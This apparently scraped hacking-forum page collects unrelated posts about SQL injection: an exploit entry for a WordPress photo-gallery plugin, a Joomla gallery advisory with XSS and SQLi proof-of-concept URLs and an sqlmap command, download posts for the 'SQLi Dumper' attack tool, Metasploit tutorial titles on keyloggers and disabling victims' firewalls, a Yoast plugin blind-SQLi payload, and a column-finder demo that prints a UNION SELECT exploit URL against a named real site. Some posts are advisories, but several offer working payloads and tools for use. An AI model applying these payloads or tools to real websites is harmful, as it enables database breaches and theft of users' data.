Search the Community

CODE : # # # # # # Exploit Title: WordPress Plugin PICA Photo Gallery v1.0 - SQL Injection # Google Dork: N/A # Date: 09.03.2017 # Vendor Homepage: https://www.apptha.com/ # Software: https://www.apptha.com/category/extension/Wordpress/PICA-Photo-Gallery # Demo: http://www.apptha.com/demo/pica-photo-gallery # Version: 1.0 # Tested on: Win7 x64, Kali Linux x64 # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Mail : ihsan[@]ihsan[.]net # # # # # # SQL Injection/Exploit : # http://localhost/[PATH]/?aid=[SQL] # For example; # -3+/*!50000union*/+select+0x496873616e2053656e63616e3c62723e7777772e696873616e2e6e6574,2,3,@@version--+- # wpapptha_term_relationships,wpapptha_term_taxonomy,wpapptha_terms,wpapptha_usermeta,wpapptha_users # Etc.. # # # # # Source/Sursa: https://packetstormsecurity.com/files/141533/WordPress-PICA-Photo-Gallery-1.0-SQL-Injection.html

Title: XSS and SQLi in huge IT gallery v1.1.5 for Joomla Fixed: v1.1.7 Author: Larry W. Cashdollar, @_larry0 and Elitza Neytcheva, @ElitzaNeytcheva Date: 2016-07-14 Download Site: http://extensions.joomla.org/extensions/extension/photos-a-images/galleries/gallery-pro Vendor: huge-it.com Vendor Notified: 2016-07-15, fixed 2016-07-23 Vendor Contact: info@huge-it.com Description: The plugin allows you to add multiple images to the gallery, create countless galleries, add a description to each of them, as well as make the same things with video links. Vulnerability: The attacker must be logged in with at least manager level access or access to the administrative panel to exploit this vulnerability: SQL in code via id parameter: ./administrator/components/com_gallery/models/gallery.php 51 public function getPropertie() { 52 $db = JFactory::getDBO(); 53 $id_cat = JRequest::getVar('id'); 54 $query = $db->getQuery(true); 55 $query->select('#__huge_itgallery_images.name as name,' 56 . '#__huge_itgallery_images.id ,' 57 . '#__huge_itgallery_gallerys.name as portName,' 58 . 'gallery_id, #__huge_itgallery_images.description as description,image_url,sl_url,sl_type,link_target,#__huge_itg allery_images.ordering,#__huge_itgallery_images.published,published_in_sl_width'); 59 $query->from(array('#__huge_itgallery_gallerys' => '#__huge_itgallery_gallerys', '#__huge_itgallery_images' => '#__huge_itg allery_images')); 60 $query->where('#__huge_itgallery_gallerys.id = gallery_id')->where('gallery_id=' . $id_cat); 61 $query->order('ordering desc'); 62 64 $db->setQuery($query); 65 $results = $db->loadObjectList(); 66 return $results; 67 } XSS is here: root@Joomla:/var/www/html# find . -name "*.php" -exec grep -l "echo \$_GET" {} \; ./administrator/components/com_gallery/views/gallery/tmpl/default.php root@Joomla:/var/www/html# find . -name "*.php" -exec grep -n "echo \$_GET" {} \; 256: <a class="modal" rel="{handler: 'iframe', size: {x: 800, y: 500}}" href="index.php?option=com_gallery&view=video&tmpl=component&pid=<?php echo $_GET['id']; ?>" title="Image" > CVE Assignments:A CVE-2016-1000113 XSS,A CVE-2016-1000114 SQL Injection JSON: Export Exploit Code: XSS PoC http://192.168.0.125/administrator/index.php?option=com_gallery&view=gallery&id=1--%20%22%3E%3Cscript%3Ealert(1);%3C/script%3E SQLi PoC http://192.168.0.125/administrator/index.php?option=com_gallery&view=gallery&id=SQLiHERE $ sqlmap --load-cookies=cookies.txt -u "http://192.168.0.125/administrator/index.php?option=com_gallery&view=gallery&id=*" --dbms mysql Screen Shots: Advisory:A http://www.vapidlabs.com/advisory.php?v=164 via

How To Use SQLi Dumper V8.0 - Powerful SQLi Tool Offer you today a wonderful program, and my personal experience and the latest version of the program Is a program: SQL Dumper v.8.0 Primitive remembrance of what distinguishes the program from the old version: 1. The speed and strength to bring sites 2. speed in the extraction of data tables 3. Protection of crach 4. extracted flag properly 5. you can get mail list 6. More and discovered it yourself The program is better than havij How To Use? First, Download Net Framework 4.0 Download & Extract SQLi Dumper v8.0.rar Open SQLi Dumper v8.0.exe Afer, Follow These Images Download link SQLi ask v.8.0.7z — RGhost — file sharing Password : sqli Have Fun !

Some basics tutorials of Metasploit- by Spirit Hello Guys, My name is Spirited wolf and today i am here to share my some nooby tutorial's of Metasploit :blackhat: So, first thing is what is Metasploit? ->So, my answer will be Metaspoit Framework is a open source penetration tool used for developing and executing exploit code against a remote target machine it, Metasploit frame work has the world’s largest database of public, tested exploits. In simple words, Metasploit can be used to test the Vulnerability of computer systems in order to protect them and on the other hand it can also be used to break into remote systems. Its a powerful tool used for penetration testing. Learning to work with metasploit needs a lot of efforts and time. Ofcourse to can learn metasploit overnight, it needs lots of practice and patience. So, here you go the :drinks: Cheerz... [Part 1]Hacking into Windows using Setoolkit+Measploit tutorial-By Spirit [Part 2]Create a Key logger to Sniff HTTPS data with metasploit tutorial-By Spirit [Part 3]Disable your victim's Windows Firewall using Metasploit-Tutorial by Spirit [Part 4]How to exploit any Windows/Linux by Firefox_xpi_bootstrapped_add-on exploit tutorial-By Spirit [Part 5]OS Command Injection Tutorial-By Spirit If you Like these Tutorial then please subscribe my channel and also do share please :drinks: But any ways it just for the newbies not for professional's :ifyouknowwhatImean: Please comment if i done anything wrong.:blackhat: ----------------------------------------------------------------------------------------------------------- This tutorial is for educational purpose only. I'll not responsible for any harm. ------------------------------------------------------------------------------------------------------------ Use your skills to protect other not to harm kiki emoticon Thanks for watching guys and keep watching pentesting with spirit Our youtube Channel link:: https://www.youtube.com/c/Pentestingwithspirit Facebook page link:: http://facebook[dot]com/Pentest.with.spirit1 Twitter account:: @spirit3113

O sa revin cand vor fi banate persoanele care nu au ce cauta pe forumul asta!

SQLi Dumper v.7 - Tool to find bugs errors or vulnerabilities in MySQL database Functions SQL Injection Operation System Function Dump Database Extract Database Schema Search Columns Name Read File (read only) Create File (read only) Brute Table & Column http://www.4shared.com/rar/7grTslfQce/SQLi_Dumper_v71.html

A critical vulnerability has been discovered in the most popular plugin of the WordPress content management platform (CMS) that puts tens of Millions of websites at risks of being hacked by the attackers. The vulnerability actually resides in most versions of a WordPress plugin known as ‘WordPress SEO by Yoast,’ which has more than 14 Million downloads according to Yoast website, making it one of the most popular plugins of WordPress for easily optimizing websites for search engines i.e Search engine optimization (SEO). The vulnerability in WordPress SEO by Yoast has been discovered by Ryan Dewhurst, developer of the WordPress vulnerability scanner ‘WPScan’. All the versions prior to 1.7.3.3 of ‘WordPress SEO by Yoast’ are vulnerable to Blind SQL Injection web application flaw, according to an advisory published today. SQL injection (SQLi) vulnerabilities are ranked as critical one because it could cause a database breach and lead to confidential information leakage. Basically in SQLi attack, an attacker inserts a malformed SQL query into an application via client-side input. HOW YOAST VULNERABILITY WORKS However, in this scenario, an outside hacker can’t trigger this vulnerability itself because the flaw actually resides in the 'admin/class-bulk-editor-list-table.php' file, which is authorized to be accessed by WordPress Admin, Editor or Author privileged users only. Therefore, in order to successfully exploit this vulnerability, it is required to trigger the exploit from authorized users only. This can be achieved with the help of social engineering, where an attacker can trick authorized user to click on a specially crafted payload exploitable URL. If the authorized WordPress user falls victim to the attack, this could allow the exploit to execute arbitrary SQL queries on the victim WordPress web site, Ryan explained to security blogger Graham Cluley. Ryan also released a proof-of-concept payload of Blind SQL Injection vulnerability in ‘WordPress SEO by Yoast’, which is as follows: http://victim-wordpress-website.com/wp-admin/admin.php?page=wpseo_bulk-editor&type=title&orderby=post_date%2c(select%20*%20from%20(select(sleep(10)))a)&order=asc PATCH FOR YOAST SQLi VULNERABILITY However, the vulnerability has reportedly been patched in the latest version of WordPress SEO by Yoast (1.7.4) by Yoast WordPress plugin developers, and change log mentions that latest version has "fixed possible CSRF and blind SQL injection vulnerabilities in bulk editor." Generally, it has been believed that if you have not installed WordPress Yoast for SEO, then your WordPress website is seriously incomplete. The vulnerability is really serious for website owners who wish to increase their search engine traffic by using this plugin. Therefore, WordPress administrators with disabled Auto-update feature are recommended to upgrade their WordPress SEO by Yoast plugin as soon as possible or they can manually download the latest version from WordPress plugin repository. If you have installed WordPress 3.7 version and above, then you can enable fully automate updating of your plugins and themes from Manage > Plugins & Themes > Auto Updates tab.

Because of the nature of barcodes, developers may not be expecting attacks from that vector and thus don't sanitize their inputs properly. I had previously written "XSS, Command and SQL Injection vectors: Beyond the Form" so this was right up my alley. I constructed this page that lets you make barcodes in Code 93, Code 39, Code 39ext and Code 128A, B and C. Link: http://www.irongeek.com/xss-sql-injection-fuzzing-barcode-generator.php

[*] Description The Full Automated Column Finder helps you to determine the correct amount of columns of the current SQL query. It is useful for SQL injection and safes you some time fuzzing manually. After the correct amount of columns was found, a sample URL for exploiting the SQL injection vulnerability can be displayed. [*] Download http://xenuser.org/tools/column_finder.py [*] Author webpage Ascii for Breakfast [*] Source Full Automated Column Finder for SQL Injection [*] Demo hp work # python column_finder.py -u "http://www.mida.ro/content.php?id=21" >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> Full Automated Column Finder for SQL Injection by Valentin Hoebel (valentin@xenuser.org) Version: 1.1 (23th May 2010) <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< >> Checking if connection can be established... >> Connected to target! URL seems to be valid. >> Trying to find the correct number of columns... >> Correct number of columns found! >> Amount: 4 >> Do you want to have a sample URL for exploiting? (Yes/No) Yes http://www.mida.ro/content.php?id=21+AND+1=2+UNION+SELECT+concat(user(),database(),version()),concat(user(),database(),version()),concat(user(),database(),version()),concat(user(),database(),version())-- Simply copy and paste this link into your browser Have fun! Bye

http://mytest-php.web44.net/ Nu stiu cat de posibil e sqlI pe acest website. Vreau sa invat mai multe despre php & sql si as fi foarte recunoscator sa lasati o mica explicatie despre: cat de vul e?; de ce?; ce trebuie modificat?;